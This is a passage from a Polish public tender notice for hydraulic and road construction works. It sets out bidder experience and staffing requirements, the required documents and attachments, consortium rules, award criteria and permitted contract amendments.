<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział Wykonawcy dysponujący odpowiednią wiedzą i doświadczeniem

Dla wykazania spełniania warunku posiadania wiedzy i doświadczenia wykonawca musi wykazać przynajmniej:
a)wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - 1 zamówienia polegającego na wykonaniu robót budowlanych potwierdzających posiadanie niezbędnej wiedzy i doświadczenia, o wartości min. 2,5 mln zł brutto,
albo
b)wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - 2 zamówień polegających na wykonaniu robót budowlanych potwierdzających posiadanie niezbędnej wiedzy i doświadczenia, jeśli suma wartości tych dwóch zamówień wynosi min. 2,5 mln zł brutto.

UWAGA: Za roboty potwierdzające posiadanie przez wykonawcę niezbędnej wiedzy 
i doświadczenia uważane będą roboty polegające na budowie lub przebudowie kolektora burzowego długości co najmniej 250 mb wraz z komorą przelewową albo roboty polegające na regulacji koryt rzek i potoków wraz z przebudową lub budową przepustu drogowego. 

Wykazywane zamówienia winny być poparte dowodami określającymi , czy roboty te zostały  wykonane w sposób należyty, oraz wskazującymi czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

W przypadku robót rozliczanych w walutach innych niż złoty polski, zamawiający dokona przeliczenia ich wartości wg średniego kursu wymiany waluty ustalonego przez Narodowy Bank Polski na dzień podany jako termin rozpoczęcia wykazanych robót budowlanych.

- kwalifikacja na podstawie zał. nr 9 i 10 do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział Wykonawcy dysponujący odpowiednim potencjałem technicznym do wykonania zamówienia.

Ocena spełnienia przez Wykonawcę powyższego warunku zostanie dokonana na podstawie oświadczenia Wykonawcy stanowiącego załącznik nr 2 do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przetargu mogą wziąć udział Wykonawcy dysponujący osobami zdolnymi do wykonania zamówienia. Dla wykazania spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia wykonawca musi wskazać następujące osoby do uczestniczenia w wykonywaniu zamówienia:
a)Kierownika budowy - 1 osobę o praktyce zawodowej wynoszącej min. 5 lat,
Ww. osoba winna legitymować się uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności: inżynieria wodna lub wodno-melioracyjna lub konstrukcyjno-inżynieryjna w zakresie budowli hydrotechnicznych lub winna posiadać inne uprawnienia odpowiadające powyższym, wydane na podstawie przepisów obowiązujących w dniu wydania uprawnień. 
b)Kierownika robót - 1 osobę o praktyce zawodowej wynoszącej min. 3 lata, Ww. osoba winna legitymować się uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie w specjalności drogowej.
c)Osobę lub osoby posiadające uprawnienia zawodowe do wykonywania samodzielnych funkcji w dziedzinie geodezji i kartografii w następujących zakresach:
-geodezyjne pomiary sytuacyjno - wysokościowe, realizacyjne i inwentaryzacyjne,
-rozgraniczanie i podział nieruchomości gruntowych oraz sporządzanie dokumentacji do celów prawnych, 
-geodezyjna obsługa inwestycji.
-kwalifikacja na podstawie zał. nr 11 i 12 do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opis sposobu dokonywania oceny spełniania tego warunku
W przetargu mogą wziąć udział Wykonawcy znajdujący się w sytuacji ekonomicznej i finansowej gwarantującej należyte wykonanie zamówienia.
Ocena spełnienia przez Wykonawcę powyższego warunku zostanie dokonana na podstawie oświadczenia Wykonawcy stanowiącego załącznik nr 2 do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Za roboty potwierdzające posiadanie przez wykonawcę niezbędnej wiedzy 
i doświadczenia uważane będą roboty polegające na budowie lub przebudowie kolektora burzowego długości co najmniej 250 mb wraz z komorą przelewową albo roboty polegające na regulacji koryt rzek i potoków wraz z przebudową lub budową przepustu drogowego. 

Wykazywane zamówienia winny być poparte dowodami określającymi , czy roboty te zostały  wykonane w sposób należyty, oraz wskazującymi czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Zamawiający nie wymaga informacji o robotach niewykonanych lub wykonanych nienależycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oferta winna być sporządzona na lub w oparciu o Formularz oferty (załącznik nr 1 do specyfikacji) oraz zawierać niżej wymienione załączniki:
Załącznik nr 1-  Tabela elementów scalonych wg podanego wzoru.
Załącznik nr 2-Oświadczenie o spełnianiu warunków udziału w postępowaniu przez wykonawcę wg podanego wzoru.
Załącznik nr 3-Oświadczenie o braku podstaw do wykluczenia wykonawcy z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych, wg podanego wzoru.
Załącznik nr 4 -a)Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy - Prawo zamówień publicznych, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b) Jeżeli zasady reprezentacji nie wynikają jednoznacznie z przedłożonych zgodnie z ppkt a dokumentów wymaga się złożenia dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania Wykonawcy.
Załącznik nr 5 -Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Załącznik nr 6 - Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert 
Załącznik nr 7-Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8, 10 i 11 Ustawy Prawo zamówień publicznych, wystawiona nie wcześniej niż 6 m-cy przed upływem terminu składania ofert. 
Załącznik nr 8    -Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy Prawo zamówień publicznych wystawiona nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
Załącznik nr 9  -  Wykaz wykonanych robót budowlanych zgodnych z definicją zawartą w pkt. III.3.2 ogłoszenia z okresu ostatnich 5 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wg podanego wzoru Doświadczenie w zakresie wykonawstwa. 
Załącznik nr 10  -	Dowody określające, czy roboty o których mowa w Załączniku nr 9 Doświadczenie w zakresie wykonawstwa zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
UWAGA:
1)Dowodami j.w, zgodnie z § 1 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. poz. 231),są:
-poświadczenie lub
-inne dokumenty, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
Dowody winny w swojej treści określać czy roboty zostały wykonane w sposób należyty oraz wskazywać , czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
2)W przypadku, gdy zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w załączniku nr 9 zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w ppkt 1).
Załącznik nr 11-	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami nt. ich kwalifikacji zawodowych, doświadczenia i wykształcenia wg podanego wzoru Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wskazanych zgodnie z pkt. III.3.4. ogłoszenia
Załącznik nr 12  - Oświadczenia wykonawcy, że osoby wskazane w zał. nr 11 posiadają wymagane uprawnienia, jeśli ustawa nakłada obowiązek posiadania takich uprawnień zgodne z podanym wzorem Kwalifikacje techniczne. 
UWAGA:
Do oferty należy dołączyć osobne oświadczenie dla każdej osoby wskazanej w zał. nr 11.
Załącznik nr 13 - Dowód wniesienia wadium.
Załącznik nr 14  -Wykaz dokumentów zastrzeżonych, jako tajne. Objęte wykazem dokumenty, stanowiące tajemnicę przedsiębiorstwa wykonawca zamieści w oddzielnej kopercie.
Brak załącznika oznaczać będzie, że wszystkie złożone przez wykonawcę dokumenty są jawne i mogą być udostępniane innym uczestnikom postępowania.
Załącznik nr 15   -Pisemne zobowiązanie podmiotu trzeciego lub inny dokument potwierdzający oddanie do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku korzystania przez Wykonawcę z zasobów innych podmiotów ( art. 26 ust. 2b).
Załącznik nr 16  -Pełnomocnictwo stosownie do postanowień zawartych w art. 23 ust. 2 ustawy Prawo zamówień publicznych.
Załącznik nr 17* -Lista podmiotów należących do tej samej co Wykonawca grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy - Prawo zamówień publicznych albo informacja o braku przynależności do grupy kapitałowej, wg podanego wzoru.
*  jeżeli dotyczy
2.Nie ujawnia się informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, jeżeli wykonawca nie później niż w terminie składania ofert zastrzeże, że nie mogą być one udostępniane oraz wykaże, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy.
3.Wymagania dotyczące przypadku złożenia oferty przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium RP lub w skład organów którego wchodzą osoby mające miejsce zamieszkania poza terytorium RP.
1)Jeżeli, w przypadku wykonawcy mającego siedzibę na terytorium Rzeczypospolitej Polskiej, osoby, o których mowa w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy - Prawo zamówień publicznych, mają miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, wykonawca składa w odniesieniu do nich zaświadczenie właściwego organu sądowego albo administracyjnego miejsca zamieszkania dotyczące niekaralności tych osób w zakresie określonym w art. 24 ust. 1 pkt 5-8, 10 i 11 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, z tym że w przypadku gdy w miejscu zamieszkania tych osób nie wydaje się takich zaświadczeń - zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego miejsca zamieszkania tych osób lub przed notariuszem. 
2)Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa:
i.     w pkt. III.6.1 ogłoszenia zał. nr 4,5,6,8:  składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:  
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, 
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie; 
ii.     w pkt. III.6.1 ogłoszenia zał. nr 7 - składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8, 10 i 11 ustawy. 
iii.     Dokumenty, o których mowa w ppkt. i lit. a i c oraz ppkt. ii, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w ppkt. i lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
iv.     Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt. i , ii, zastępuje się je dokumentem zawierającym oświadczenie złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem,. Przepis ppkt. iii stosuje się odpowiednio. 
v. W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
4.Wymagania ogólne dotyczące sporządzenia oferty:
1)Wykonawcy powinni przedstawić oferty zgodne z wymaganiami specyfikacji istotnych warunków zamówienia. Oferta winna zawierać wszystkie wymagane dokumenty, oświadczenia, załączniki i należy ją sporządzić na lub w oparciu o Formularz oferty. Wykonawców obowiązuje wykorzystanie załączonych wzorów załączników. Wszystkie pola i pozycje tych wzorów winny być wypełnione. 
2)Dokumenty, o których mowa w pkt. III.6.1 ogłoszenia  mogą być przedstawione w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez uprawnionych przedstawicieli wykonawcy. Oświadczenia Wykonawców (np. zał. nr 2, 3) oraz pisemne zobowiązanie podmiotu do udostępnienia niezbędnych zasobów (zał nr 15) powinny być przedłożone w oryginale.
Pełnomocnictwo do reprezentowania wykonawców występujących wspólnie oraz ewentualne pełnomocnictwo dla osoby reprezentującej wykonawcę powinny być przedłożone w oryginale lub w formie kopii notarialnie poświadczonej. 
3)Ofertę składa się w formie pisemnej.
4)Zamawiający nie wyraża zgody na złożenie ofert w postaci elektronicznej.
5)Oferta powinna być napisana w języku polskim, trwałą i czytelną techniką (np. na maszynie do pisania, komputerze, długopisem) w 1 egzemplarzu. Wszystkie dokumenty w języku obcym należy załączyć wraz z ich tłumaczeniem na język polski.
6)Oferta, załączniki, oświadczenia muszą być podpisane przez osobę (osoby) uprawnione do reprezentowania wykonawcy.
Jeżeli zasady reprezentacji nie wynikają z przedłożonych dokumentów wymaga się złożenie dokumentu wskazującego osobę uprawnioną lub upoważnioną do reprezentowania wykonawcy.
7)Wszystkie miejsca, w których wykonawca naniósł zmiany powinny być parafowane przez osobę podpisującą ofertę. Ewentualne zmiany powinny być naniesione czytelnie.
8)Wykonawcy ponoszą wszystkie koszty związane ze sporządzeniem i złożeniem oferty niezależnie od wyniku postępowania przetargowego.
9)Wykonawca może złożyć jedną ofertę.
10)Wykonawca winien zgromadzić wszelkie informacje, które mogą być konieczne do przygotowania oferty na własny koszt.
Zamawiający na życzenie wykonawcy umożliwi przeprowadzenie wizji lokalnej. Wszystkie koszty związane z przeprowadzeniem wizji lokalnej ponosi samodzielnie każdy Wykonawca.

5.Postanowienia w przypadku złożenia oferty wspólnej przez dwóch lub więcej wykonawców, o których mowa w art. 23 ustawy Prawo zamówień publicznych (konsorcjum wykonawców).
1)Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
2)Pełnomocnictwo do pełnienia takiej funkcji, wystawione zgodnie z wymogami prawa, podpisane przez prawnie upoważnionych przedstawicieli każdego z wykonawców winno być dołączone do oferty.
3)Przedsiębiorcy prowadzący działalność w formie spółki cywilnej winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i do zawarcia umowy o wykonanie przedmiotowego zamówienia (art. 23 ust. 2 ustawy - Prawo zamówień publicznych), ewentualnie przedłożyć umowę spółki lub uchwałę wspólników określające zakres uprawnień do reprezentowania spółki przez wspólników (art. 865 Kodeksu cywilnego).
4)Postanowienia specyfikacji dotyczące wykonawców występujących wspólnie stosuje się odpowiednio do wspólników spółki cywilnej (z tym, że w ramach zał. nr 5 i 6 do oferty złożyć należy zaświadczenia dotyczące wspólników spółki oraz samej spółki cywilnej).
5)Zgodnie z art. 141 ustawy Prawo zamówień publicznych wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.
6)Dokumenty, oświadczenia, załączniki do oferty składane łącznie przez wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny być podpisane przez ustanowionego pełnomocnika. Dokumenty, oświadczenia, załączniki do oferty składane oddzielnie przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, powinny być podpisane przez osobę (osoby) uprawnione do reprezentowania Wykonawcy, od której pochodzą.
7)Kopie dokumentów i oświadczeń dotyczących każdego z wykonawców wspólnie ubiegających się o udzielenie zamówienia powinny być poświadczone za zgodność z oryginałem przez wykonawcę, którego dokument lub oświadczenie dotyczy.
8)Oferta winna być sporządzona wg następujących zasad:
a)formularz oferty i załączniki nr 1,2,13,14,15 i 16 wykonawcy występujący wspólnie składają jako jeden łączny, podpisany przez pełnomocnika z zastrzeżeniem, że:
- pisemne zobowiązanie podmiotu do oddania do dyspozycji wykonawcy niezbędnych zasobów (zał nr 15) winno być podpisane przez osobę (osoby) uprawnione do reprezentowania podmiotu udostępniającego zasoby,
- pełnomocnictwo określone w art. 23 ust 2 ustawy  - Prawo zamówień publicznych (zał nr 16) winno być podpisane przez osobę (osoby) uprawnione do reprezentowania każdego z wykonawców . 
b)załączniki do oferty nr 3,4,5,6,7,8,17 winny pochodzić od każdego z podmiotów oddzielnie,
c)załączniki nr 9,10,11,12:
Ponieważ oceniany będzie łączny potencjał kadrowy i kwalifikacje, łączne doświadczenie wspólnie ubiegających się o udzielenie zamówienia wykonawców, nie jest wymagane złożenie ww. dokumentów przez wszystkich wykonawców, lecz dokumenty te mają obowiązek złożyć ten lub ci z wykonawców, którzy w imieniu wszystkich wykażą spełnienie tego warunku łącznie.
6.Postanowienia w przypadku złożenia oferty przez wykonawcę polegającego na zasobach innych podmiotów, o którym mowa w art. 26 ust. 2b ustawy Prawo zamówień publicznych.
1)Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
2)Powołując się na spełnianie warunku udziału w postępowaniu przez inny podmiot, wykonawca jest zobowiązany udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  zobowiązanie podmiotu do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (zał. nr 15 do oferty). 
3)Podmiot, który zobowiązał się do udostępnienia zasobów , odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
4)Treść zobowiązania podmiotu trzeciego powinna określać w szczególności, kto jest podmiotem przyjmującym zasoby , przedmiot oraz zakres zobowiązania podmiotu trzeciego , czego konkretnie dotyczy zobowiązanie i w jaki sposób będzie ono wykonane oraz jakiego okresu zobowiązanie dotyczy.
5)Kopie dokumentów dotyczących przedmiotu , na którego zasoby powołuje się wykonawca , powinny być poświadczone za zgodność z oryginałem przez ten podmiot.
6. W przetargu mogą wziąć udział wykonawcy:
a)posiadający uprawnienia do wykonywania działalności lub czynności niezbędnych do należytego wykonania zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b)posiadający wiedzę i doświadczenie zapewniające należyte wykonanie zamówienia,
c)dysponujący odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d)znajdujący się w sytuacji ekonomicznej i finansowej gwarantującej należyte wykonanie zamówienia,
e)niepodlegający wykluczeniu z postępowania na podstawie art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres rękojmi i gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający, niezależnie od pozostałych przypadków przewidzianych w umowie, dopuszcza możliwość zmian postanowień w niej zawartych w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:
a)Udzielenia Wykonawcy zamówień dodatkowych lub uzupełniających, od wykonania których uzależniona jest realizacja przedmiotu umowy, 
b)Ograniczenia zakresu rzeczowego umowy,
c)Zmiany przepisów prawnych dotyczących przedmiotu umowy, jeżeli zmiana przepisów wymaga zmiany postanowień umowy,
d)Sytuacji niezależnych od stron umowy, 
e)W przypadku działania siły wyższej, powodującej konieczność wprowadzenia zmian do umowy. Przez działanie siły wyższej należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od stron umowy, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których strony umowy nie mogły przewidzieć i którym nie mogły zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. Wykonawca jest zobowiązany niezwłocznie poinformować Zamawiającego o fakcie zaistnienia siły wyższej oraz wskazać zakres i wpływ jakie zdarzenie miało na przebieg realizacji przedmiotu umowy.
f)Gdy potrzeba wprowadzenia zmian umowy wynika z okoliczności natury technicznej (w tym zmian dokumentacji projektowej) i prawnej oraz zmian warunków przyznania Zamawiającemu środków finansowych przeznaczonych na wynagrodzenie Wykonawcy za wykonanie przedmiotu umowy.
g)Gdy zmiana planu finansowego Zamawiającego, dokonana po upływie terminu składania ofert, wymaga zmiany umowy w zakresie fakturowania przejściowego, kwot przerobu Harmonogramu realizacji 
i finansowania zadania.
